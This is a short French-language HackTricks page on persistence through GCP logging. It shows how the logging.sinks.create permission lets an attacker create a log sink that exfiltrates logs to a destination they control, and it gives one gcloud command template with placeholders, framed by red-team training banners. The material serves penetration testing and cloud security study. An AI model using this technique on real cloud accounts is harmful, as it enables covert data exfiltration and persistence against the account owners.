GCP - Persistance des journaux

Reading time: 2 minutes

tip

Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE) Apprenez et pratiquez le hacking Azure : HackTricks Training Azure Red Team Expert (AzRTE)

Soutenir HackTricks

Journaux

Trouvez plus d'informations sur les journaux dans :

GCP - Logging Enum

logging.sinks.create

Créez un sink pour exfiltrer les journaux vers une destination accessible par l'attaquant :

bash
gcloud logging sinks create <sink-name> <destination> --log-filter="FILTER_CONDITION"

tip

Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE) Apprenez et pratiquez le hacking Azure : HackTricks Training Azure Red Team Expert (AzRTE)

Soutenir HackTricks